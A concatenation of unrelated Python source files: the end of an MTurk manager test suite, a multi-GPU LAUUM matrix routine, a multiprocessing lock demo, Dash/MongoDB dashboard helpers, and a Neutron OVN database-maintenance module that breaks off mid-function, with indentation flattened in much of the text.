manager.expire_all_unassigned_hits()
worker_manager.get_complete_hits.assert_called_once()
expire_calls = MTurkManagerFile.mturk_utils.expire_hit.call_args_list
self.assertEqual(len(expire_calls), 2)
for hit in [incomplete_1, incomplete_2]:
found = False
for expire_call in expire_calls:
if expire_call[0][1] == hit:
found = True
break
self.assertTrue(found)
def test_qualification_management(self):
manager = self.mturk_manager
test_qual_name = 'test_qual'
other_qual_name = 'other_qual'
test_qual_id = 'test_qual_id'
worker_id = self.agent_1.worker_id
mturk_utils = MTurkManagerFile.mturk_utils
success_id = 'Success'
def find_qualification(qual_name, _sandbox):
if qual_name == test_qual_name:
return test_qual_id
return None
mturk_utils.find_qualification = find_qualification
mturk_utils.give_worker_qualification = mock.MagicMock()
mturk_utils.remove_worker_qualification = mock.MagicMock()
mturk_utils.find_or_create_qualification = mock.MagicMock(
return_value=success_id
)
# Test give qualification
manager.give_worker_qualification(worker_id, test_qual_name)
mturk_utils.give_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, None, manager.is_sandbox
)
# Test revoke qualification
manager.remove_worker_qualification(worker_id, test_qual_name)
mturk_utils.remove_worker_qualification.assert_called_once_with(
worker_id, test_qual_id, manager.is_sandbox, ''
)
# Test create qualification can exist
result = manager.create_qualification(test_qual_name, '')
self.assertEqual(result, success_id)
# Test create qualification can't exist failure
result = manager.create_qualification(test_qual_name, '', False)
self.assertIsNone(result)
# Test create qualification can't exist success
result = manager.create_qualification(other_qual_name, '')
self.assertEqual(result, success_id)
def test_partner_disconnect(self):
manager = self.mturk_manager
manager.send_command = mock.MagicMock()
self.agent_1.set_status(AssignState.STATUS_IN_TASK)
manager._handle_partner_disconnect(self.agent_1)
self.assertEqual(
self.agent_1.get_status(), AssignState.STATUS_PARTNER_DISCONNECT
)
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, self.agent_1.worker_id)
self.assertEqual(assignment_id, self.agent_1.assignment_id)
self.assertDictEqual(data, self.agent_1.get_inactive_command_data())
@testing_utils.retry()
def test_restore_state(self):
manager = self.mturk_manager
worker_manager = manager.worker_manager
worker_manager.change_agent_conversation = mock.MagicMock()
manager.send_command = mock.MagicMock()
agent = self.agent_1
agent.conversation_id = 'Test_conv_id'
agent.id = 'test_agent_id'
agent.request_message = mock.MagicMock()
agent.message_request_time = time.time()
test_message = {
'text': 'this_is_a_message',
'message_id': 'test_id',
'type': data_model.MESSAGE_TYPE_MESSAGE,
}
agent.append_message(test_message)
manager._restore_agent_state(agent.worker_id, agent.assignment_id)
self.assertFalse(agent.alived)
manager.send_command.assert_not_called()
worker_manager.change_agent_conversation.assert_called_once_with(
agent=agent, conversation_id=agent.conversation_id, new_agent_id=agent.id
)
agent.alived = True
assert_equal_by(lambda: len(agent.request_message.call_args_list), 1, 0.6)
manager.send_command.assert_called_once()
args = manager.send_command.call_args[0]
worker_id, assignment_id, data = args[0], args[1], args[2]
self.assertEqual(worker_id, agent.worker_id)
self.assertEqual(assignment_id, agent.assignment_id)
self.assertListEqual(data['messages'], agent.get_messages())
self.assertEqual(data['text'], data_model.COMMAND_RESTORE_STATE)
def test_expire_onboarding(self):
manager = self.mturk_manager
manager.force_expire_hit = mock.MagicMock()
self.agent_2.set_status(AssignState.STATUS_ONBOARDING)
manager._expire_onboarding_pool()
manager.force_expire_hit.assert_called_once_with(
self.agent_2.worker_id, self.agent_2.assignment_id
)
if __name__ == '__main__':
unittest.main(buffer=True)
|
ooc_lauum.py
|
import math
import threading
from typing import List, Optional
import numpy as np
import torch
from falkon.cuda import initialization
from falkon.utils import devices, PropagatingThread
from falkon.utils.helpers import sizeof_dtype
from falkon.options import FalkonOptions, LauumOptions
from .ooc_utils import calc_block_sizes2, prepare_matrix
from .parallel_lauum import par_lauum_f_lower, par_lauum_c_lower, BlockAlloc
from ..utils.tensor_helpers import is_f_contig, is_contig
__all__ = ("gpu_lauum",)
def _parallel_lauum_runner(A, write_opposite: bool, opt: LauumOptions, gpu_info):
# Choose target:
if is_f_contig(A):
target = par_lauum_f_lower
elif is_contig(A):
target = par_lauum_c_lower
else:
raise NotImplementedError("Parallel LAUUM is only implemented for contiguous matrices")
num_gpus = len(gpu_info)
if num_gpus < 1:
        raise ValueError(
            "Parallel LAUUM requires at least one GPU to be available.")
N = A.shape[0]
dt = A.dtype
dts = sizeof_dtype(dt)
avail_ram = min([g.actual_free_mem for g in gpu_info]) / dts
# Each GPU should be able to hold in memory 2 block columns
max_block_size = int(math.floor(avail_ram / (2*N)))
if max_block_size < 1:
raise RuntimeError(
"Cannot run parallel LAUUM with minimum "
"available memory of %.2fMB" % (avail_ram * dts / 2**20))
block_sizes = calc_block_sizes2(
max_block_size, num_gpus, N, opt.lauum_par_blk_multiplier)
block_allocations: List[BlockAlloc] = []
cur_n = 0
for bs in block_sizes:
block_allocations.append(BlockAlloc(start=cur_n, end=cur_n + bs, length=bs))
cur_n += bs
barrier = threading.Barrier(num_gpus, timeout=1000)
threads = []
for g in gpu_info:
gid_allocs = [i for i in range(len(block_allocations)) if i % num_gpus == g.Id]
cublas_handle = initialization.cublas_handle(g.Id)
if cublas_handle is None:
raise RuntimeError("CUBLAS must be initialized "
"on device %d before running parallel LAUUM." % (g.Id))
t = PropagatingThread(target=target, name="GPU-%d" % (g.Id), args=(
A, block_allocations, gid_allocs, barrier, g.Id, cublas_handle, write_opposite))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
return A
def gpu_lauum(A, upper, overwrite=True, write_opposite=False, opt: Optional[FalkonOptions] = None):
"""
Parameters
-----------
A : ndarray [N, N]
2D positive-definite matrix that will be factorized as
A = U.T @ U (if `upper` is True) or A = L @ L.T if `upper`
is False.
overwrite : bool
Whether to overwrite matrix A or to output the result in a new
buffer.
Notes
------
The factorization will always be the 'lower' version of the factorization
which could however end up on the upper-triangular part of the matrix
in case A is not Fortran contiguous to begin with.
"""
if opt is None:
opt = FalkonOptions()
gpu_info = [v for k, v in devices.get_device_info(opt).items() if k >= 0]
for g in gpu_info:
g.actual_free_mem = min((g.free_memory - 300 * 2 ** 20) * 0.95,
opt.max_gpu_mem * 0.95)
# Start matrix preparations
if isinstance(A, np.ndarray):
Anp = A
elif isinstance(A, torch.Tensor):
Anp = A.numpy()
else:
        raise TypeError("Unexpected type encountered for A: %s" % (type(A)))
if not overwrite:
Anp = np.copy(Anp, order='A')
# Will give a fortran-contiguous numpy array. No copies are performed.
Anp, transposed = prepare_matrix(Anp)
if transposed:
upper = not upper
# Parallel can only do lower C or F-contiguous arrays
# But by transposing as necessary, it is able to run with every combination of inputs.
At = torch.from_numpy(Anp)
if upper:
At = At.T
# The parallel runner chooses based on the contiguity pattern of the inputs.
_parallel_lauum_runner(At, write_opposite, opt, gpu_info)
if transposed:
Anp = Anp.T
if isinstance(A, np.ndarray):
return Anp
else:
return torch.from_numpy(Anp)
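# Minimal usage sketch (not part of the library): run LAUUM on the lower
# Cholesky factor of a small positive-definite matrix. This assumes at least
# one CUDA GPU is visible; without a GPU the parallel runner raises an error.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    mat = rng.standard_normal((512, 512))
    mat = mat @ mat.T + 512 * np.eye(512)  # make the matrix positive definite
    chol = np.linalg.cholesky(mat)  # lower-triangular Cholesky factor
    # Overwrites the lower triangle of `chol` with the LAUUM product in-place.
    out = gpu_lauum(chol, upper=False, overwrite=True)
    print(out.shape, out.dtype)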
|
p5.py
|
from multiprocessing import Process, Lock
def display(k, n):
k.acquire()
    print('Hi', n)
k.release()
if __name__ == '__main__':
lock = Lock()
names = ['Alice', 'Bob', 'Carol', 'Dennis']
for n in names:
p = Process(target=display, args=(lock,n,))
p.start()
p.join()
print("Exiting main")
|
utils.py
|
from line_profiler import LineProfiler
from pymongo import MongoClient
from threading import Thread
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import itertools
from io import BytesIO
from PIL import Image
import pickle
import base64
import numpy as np
import sys
################ **Optimizing Utils** ##################
import time
import sys
def timeFigureUpdate(title):
def wrapper(func):
def timeit(*args):
start = time.time()
x = func(*args)
end = time.time()
# print("Elapsed Time: {}".format(end-start),file=sys.stdout)
sys.stdout.write("Elapsed Time of {} update_figure_and_data_structure function: {}\n".format(title,end-start))
return x
return timeit
return wrapper
def profile(title):
def wrapper(f):
def printProfile(*args):
lp = LineProfiler()
dec_f = lp(f)
output_value = dec_f(*args)
print("Line Profile for:",title)
print("----------------------")
lp.print_stats()
return output_value
return printProfile
return wrapper
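# Illustrative usage sketch for the two decorators above (the callback name
# and its argument are hypothetical):
#
#     @timeFigureUpdate("scatter plot")
#     def update_scatter_figure(selected_rows):
#         ...  # build and return the figure; elapsed time is printed per call
#
#     @profile("update_scatter_figure")
#     def update_scatter_figure_profiled(selected_rows):
#         ...  # same body, with a line-by-line profile printed per call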
##############################################################
class Database():
def __init__(self):
self.client = MongoClient()
self.checkConnection()
## Database utilities
    ## I do not want the user to accidentally delete all their data
# def removeDataBase(self,folder_name):
# self.client.drop_database(folder_name)
def removeFolder(self,database_name,folder_name):
self.client[database_name][folder_name].drop()
def viewDataBase(self,database_name):
'''
        show all folders (collections) in the given database
'''
# include include_system_collections=False?
for collection in self.client[database_name].list_collection_names():
print(collection)
def getAllFolderIteratorsFromDatabase(self,database_name):
folder_iterators_list= []
folder_names = self.client[database_name].list_collection_names()
for folder_name in folder_names:
iterator = self.client[database_name][folder_name].find()
folder_iterators_list.append(iterator)
return folder_iterators_list
def viewFolder(self,database_name,folder_name):
'''
show all documents in a collection
'''
for doc in self.client[database_name][folder_name].find():
print(doc)
def close(self):
self.client.close()
    ## Connection utilities, not meant to be used by the user
def checkConnection(self):
t = Thread(target=self.testInsert)
t.start()
t.join(2)
if t.is_alive():
raise Exception("Cannot connect to MongoDB")
    def testInsert(self):
        collection = self.client['test_db']['test_collection']
        collection.insert_one({"Test": 1})
        collection.delete_one({"Test": 1})
################ **Misc** ##################
from functools import partial
def partial_decomaker(partial_name):
def decorator(func):
partial_func = partial(func,partial_name=partial_name)
return partial_func
return decorator
from inspect import getsource
def code(function):
print(getsource(function))
################ **Functions used to load Data in** ##################
def getParamDict(database_name,folder_name):
mongo = Database()
runs = mongo.client[database_name][folder_name]
## all the runs in the folder
runs_iterator = runs.find()
dict_of_dicts = {}
for run_object in runs_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
dict_of_dicts[time] = Experimental_Parameters
return dict_of_dicts
def getLegendNames(dict_of_param_dicts):
list_of_param_names = []
for time,plot_dict in dict_of_param_dicts.items():
list_of_param_names.append(plot_dict.keys())
legend_names = sorted(set(list(itertools.chain(*list_of_param_names))))
return legend_names
## Object Related
def getDictOfNameObjects(database_name,folder_name,name,f=None):
mongo = Database()
runs = mongo.client[database_name][folder_name]
## all the runs in the folder
runs_iterator = runs.find()
nameObjects_for_each_run = {}
# paramObjects_for_each_run = {}
for run_object in runs_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
# param_objects_for_each_run[time] = Experimental_Parameters
try:
one_run_dict = run_object[name]
if f:
one_run_dict = f(one_run_dict)
nameObjects_for_each_run[time] = one_run_dict
except KeyError:
print("Name does not exist in the run")
mongo.close()
# return nameObjects_for_each_run, paramObjects_for_each_run
return nameObjects_for_each_run
def getBase64Encoding(one_run_dict):
return {image_name:binaryToBase64(binary_image) for image_name,binary_image in one_run_dict.items()}
def binaryToBase64(binary_image):
numpy_matrix=pickle.loads(binary_image)
img = Image.fromarray(np.uint8(numpy_matrix*255),'L')
# base64_string= base64.b64encode(numpy_matrix)
buff = BytesIO()
img.save(buff, format="JPEG")
base64_string = base64.b64encode(buff.getvalue())
buff.close()
    return base64_string.decode('ascii')  # same result as str(...)[2:-1], but explicit
def getFigureNames(nameObjects_for_each_run):
list_of_names = []
for time, one_run_dict in nameObjects_for_each_run.items():
list_of_names.append(one_run_dict.keys())
names = sorted(set(list(itertools.chain(*list_of_names))))
return names
##############################################################
def createHTMLRowList(self):
html_row_list = []
for time in self.ordered_thoughtList_keys:
thought_list = self.dict_of_all_thought_lists[time]
title_row = createThoughtsTitle(thought_list,time)
html_row_list.append(title_row)
paragraph_for_each_thought = createThoughts(thought_list)
paragraph_row = html.Div(paragraph_for_each_thought,className='row')
html_row_list.append(paragraph_row)
return html_row_list
## only takes 0.1 seconds, so there is no issue in updating it
# @profile("Thoughts")
def getDictOfAllThoughtLists(database_name):
mongo = Database()
folder_iterators_list = mongo.getAllFolderIteratorsFromDatabase(database_name)
database_dict = {}
for folder_iterator in folder_iterators_list:
dict_of_thoughtlists = getDictOfThoughtLists(folder_iterator)
database_dict.update(dict_of_thoughtlists)
mongo.close()
return database_dict
#########################
def getDictOfThoughtLists(folder_iterator):
dict_of_thoughtlists = {}
for run_object in folder_iterator:
Experimental_Parameters = run_object['Experimental Parameters']
time = Experimental_Parameters['Time']
try:
thought_list = run_object['Thoughts']
## eliminating the extra self.folder_name logs
dict_of_thoughtlists[time]=thought_list
except KeyError:
print("Run object does not have 'Thoughts' as a key")
return dict_of_thoughtlists
#########################
def getOrderedKeys(dict_of_thoughtlists):
return sorted(dict_of_thoughtlists.keys())
def createThoughts(list_of_thoughts):
paragraph_list = []
## skipping the folder_names
for thought in list_of_thoughts[1::2]:
paragraph = html.P(thought)
paragraph_list.append(paragraph)
return paragraph_list
def createThoughtsTitle(list_of_thoughts,time):
folder_name = list_of_thoughts[0]
## No need for year and seconds
title_row = html.Div(html.B(time[5:-3]+': '+folder_name),className='row')
return title_row
##############################################################
################ **Functions used During Callbacks** ##################
def getSelectedRunsFromDatatable(rows,selected_row_indices):
    if not selected_row_indices:
        selected_runs = rows
else:
selected_runs = [rows[i] for i in selected_row_indices]
return [run_dict['Time'] for run_dict in selected_runs]
if __name__ == '__main__':
database = Database()
database.client['test_db']['test_collection'].insert_one({"Test":"test"})
    database.viewFolder('test_db', 'test_collection')
    database.removeFolder('test_db', 'test_collection')
    database.viewFolder('test_db', 'test_collection')
|
maintenance.py
|
# Copyright 2019 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import inspect
import threading
from futurist import periodics
from neutron_lib.api.definitions import external_net
from neutron_lib import constants as n_const
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ovsdbapp.backend.ovs_idl import event as row_event
from neutron.common.ovn import constants as ovn_const
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf
from neutron.db import ovn_hash_ring_db as hash_ring_db
from neutron.db import ovn_revision_numbers_db as revision_numbers_db
from neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb import ovn_db_sync
CONF = cfg.CONF
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
INCONSISTENCY_TYPE_CREATE_UPDATE = 'create/update'
INCONSISTENCY_TYPE_DELETE = 'delete'
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
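# Illustrative usage sketch (assumes `ovn_client` is an already-constructed
# OVNClient; DBInconsistenciesPeriodics is defined further below):
#
#     maintenance_thread = MaintenanceThread()
#     maintenance_thread.add_periodics(DBInconsistenciesPeriodics(ovn_client))
#     maintenance_thread.start()
#     ...
#     maintenance_thread.stop()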
def rerun_on_schema_updates(func):
"""Tasks decorated with this will rerun upon database version updates."""
func._rerun_on_schema_updates = True
return func
class OVNNBDBReconnectionEvent(row_event.RowEvent):
"""Event listening to reconnections from OVN Northbound DB."""
def __init__(self, driver, version):
self.driver = driver
self.version = version
table = 'Connection'
events = (self.ROW_CREATE,)
super(OVNNBDBReconnectionEvent, self).__init__(events, table, None)
self.event_name = self.__class__.__name__
def run(self, event, row, old):
curr_version = self.driver.get_ovn_nbdb_version()
if self.version != curr_version:
self.driver.nbdb_schema_updated_hook()
self.version = curr_version
class SchemaAwarePeriodicsBase(object):
def __init__(self, ovn_client):
self._nb_idl = ovn_client._nb_idl
self._set_schema_aware_periodics()
self._nb_idl.idl.notify_handler.watch_event(OVNNBDBReconnectionEvent(
self, self.get_ovn_nbdb_version()))
def get_ovn_nbdb_version(self):
return self._nb_idl.idl._db.version
def _set_schema_aware_periodics(self):
self._schema_aware_periodics = []
for name, member in inspect.getmembers(self):
if not inspect.ismethod(member):
continue
schema_upt = getattr(member, '_rerun_on_schema_updates', None)
if schema_upt and periodics.is_periodic(member):
LOG.debug('Schema aware periodic task found: '
'%(owner)s.%(member)s',
{'owner': self.__class__.__name__, 'member': name})
self._schema_aware_periodics.append(member)
@abc.abstractmethod
def nbdb_schema_updated_hook(self):
"""Hook invoked upon OVN NB schema is updated."""
class DBInconsistenciesPeriodics(SchemaAwarePeriodicsBase):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._sb_idl = self._ovn_client._sb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
super(DBInconsistenciesPeriodics, self).__init__(ovn_client)
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip,
'ovn_create': self._ovn_client.create_floatingip,
'ovn_update': self._ovn_client.update_floatingip,
'ovn_delete': self._ovn_client.delete_floatingip,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._get_security_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
def _get_security_group(self, uuid):
return (self._nb_idl.get_address_set(uuid) or
self._nb_idl.get_port_group(uuid))
@property
def has_lock(self):
return not self._idl.is_lock_contended
def nbdb_schema_updated_hook(self):
if not self.has_lock:
return
for func in self._schema_aware_periodics:
            LOG.debug('OVN Northbound DB schema version was updated, '
                      'invoking "%s"', func.__name__)
try:
func()
except periodics.NeverAgain:
pass
except Exception:
LOG.exception(
'Unknown error while executing "%s"', func.__name__)
def _fix_create_update(self, context, row):
res_map = self._resources_func_map[row.resource_type]
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](context, n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
                # If the resource exists in the OVN DB but the revision
                # number differs from the Neutron DB, update it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](context, n_obj)
else:
                    # If the resource exists and the revision number
                    # is equal on both databases, just bump the revision on
                    # the cache table.
revision_numbers_db.bump_revision(context, n_obj,
row.resource_type)
def _fix_delete(self, context, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
revision_numbers_db.delete_revision(
context, row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](context, row.resource_uuid)
def _fix_create_update_subnet(self, context, row):
        # Get the latest version of the subnet in Neutron DB
sn_db_obj = self._ovn_client._plugin.get_subnet(
context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(context, sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(context, sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
@periodics.periodic(spacing=10, run_immediately=True)
@rerun_on_schema_updates
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if (not self._nb_idl.is_port_groups_supported() or
not self._nb_idl.get_address_sets()):
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
def _log_maintenance_inconsistencies(self, create_update_inconsistencies,
delete_inconsistencies):
if not CONF.debug:
return
def _log(inconsistencies, type_):
if not inconsistencies:
return
c = {}
for f in inconsistencies:
if f.resource_type not in c:
c[f.resource_type] = 1
else:
c[f.resource_type] += 1
fail_str = ', '.join('{}={}'.format(k, v) for k, v in c.items())
LOG.debug('Maintenance task: Number of inconsistencies '
'found at %(type_)s: %(fail_str)s',
{'type_': type_, 'fail_str': fail_str})
_log(create_update_inconsistencies, INCONSISTENCY_TYPE_CREATE_UPDATE)
_log(delete_inconsistencies, INCONSISTENCY_TYPE_DELETE)
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
create_update_inconsistencies = (
revision_numbers_db.get_inconsistent_resources(admin_context))
delete_inconsistencies = (
revision_numbers_db.get_deleted_resources(admin_context))
if not any([create_update_inconsistencies, delete_inconsistencies]):
LOG.debug('Maintenance task: No inconsistencies found. Skipping')
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._log_maintenance_inconsistencies(create_update_inconsistencies,
delete_inconsistencies)
self._sync_timer.restart()
dbg_log_msg = ('Maintenance task: Fixing resource %(res_uuid)s '
'(type: %(res_type)s) at %(type_)s')
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_CREATE_UPDATE})
try:
                # NOTE(lucasagomes): The way to fix subnets is a bit
                # different from other resources. A subnet in OVN terms
                # is just a DHCP rule, and this rule only exists if the
                # subnet in Neutron has the "enable_dhcp" attribute set
                # to True. So, it's possible to have a consistent subnet
                # resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(admin_context, row)
else:
self._fix_create_update(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix resource '
'%(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
LOG.debug(dbg_log_msg, {'res_uuid': row.resource_uuid,
'res_type': row.resource_type,
'type_': INCONSISTENCY_TYPE_DELETE})
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(admin_context,
row.resource_uuid)
else:
self._fix_delete(admin_context, row)
except Exception:
LOG.exception('Maintenance task: Failed to fix deleted '
'resource %(res_uuid)s (type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task: Synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, context, port):
router_id = port['device_id']
self._ovn_client._l3_plugin.add_router_interface(
context, router_id, {'port_id': port['id']})
def _check_subnet_global_dhcp_opts(self):
inconsistent_subnets = []
admin_context = n_context.get_admin_context()
subnet_filter = {'enable_dhcp': [True]}
neutron_subnets = self._ovn_client._plugin.get_subnets(
admin_context, subnet_filter)
global_v4_opts = ovn_conf.get_global_dhcpv4_opts()
global_v6_opts = ovn_conf.get_global_dhcpv6_opts()
LOG.debug('Checking %s subnets for global DHCP option consistency',
len(neutron_subnets))
for subnet in neutron_subnets:
ovn_dhcp_opts = self._nb_idl.get_subnet_dhcp_options(
subnet['id'])['subnet']
inconsistent_opts = []
if ovn_dhcp_opts:
if subnet['ip_version'] == n_const.IP_VERSION_4:
for opt, value in global_v4_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if subnet['ip_version'] == n_const.IP_VERSION_6:
for opt, value in global_v6_opts.items():
if value != ovn_dhcp_opts['options'].get(opt, None):
inconsistent_opts.append(opt)
if inconsistent_opts:
LOG.debug('Subnet %s has inconsistent DHCP opts: %s',
subnet['id'], inconsistent_opts)
inconsistent_subnets.append(subnet)
return inconsistent_subnets
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600,
run_immediately=True)
def check_global_dhcp_opts(self):
# This periodic task is included in DBInconsistenciesPeriodics since
# it uses the lock to ensure only one worker is executing
if not self.has_lock:
return
if (not ovn_conf.get_global_dhcpv4_opts() and
not ovn_conf.get_global_dhcpv6_opts()):
# No need to scan the subnets if the settings are unset.
raise periodics.NeverAgain()
LOG.debug('Maintenance task: Checking DHCP options on subnets')
self._sync_timer.restart()
fix_subnets = self._check_subnet_global_dhcp_opts()
if fix_subnets:
admin_context = n_context.get_admin_context()
LOG.debug('Triggering update for %s subnets', len(fix_subnets))
for subnet in fix_subnets:
neutron_net = self._ovn_client._plugin.get_network(
admin_context, subnet['network_id'])
try:
self._ovn_client.update_subnet(admin_context, subnet,
neutron_net)
except Exception:
LOG.exception('Failed to update subnet %s',
subnet['id'])
self._sync_timer.stop()
LOG.info('Maintenance task: DHCP options check finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
raise periodics.NeverAgain()
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=1800, run_immediately=True)
def check_metadata_ports(self):
# If OVN metadata is disabled do not run this task again
if not ovn_conf.is_ovn_metadata_enabled():
raise periodics.NeverAgain()
# Make sure that only one worker is executing this
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
for n in self._ovn_client._plugin.get_networks(admin_context):
self._ovn_client.create_metadata_port(admin_context, n)
raise periodics.NeverAgain()
# TODO(lucasagomes): Remove this in the U cycle
# A static spacing value is used here, but this method will only run
# once per lock due to the use of periodics.NeverAgain().
@periodics.periodic(spacing=600, run_immediately=True)
def check_for_port_security_unknown_address(self):
if not self.has_lock:
return
for port in self._nb_idl.lsp_list().execute(check_error=True):
if port.type == ovn_const.LSP_TYPE_LOCALNET:
continue
addresses = port.addresses
type_ = port.type.strip()
if not port.port_security:
if not type_ and ovn_const.UNKNOWN_ADDR not in addresses:
addresses.append(ovn_const.UNKNOWN_ADDR)
elif type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
else:
if type_ and ovn_const.UNKNOWN_ADDR in addresses:
addresses.remove(ovn_const.UNKNOWN_ADDR)
elif not type_ and ovn_const.UNKNOWN_ADDR in addresses:
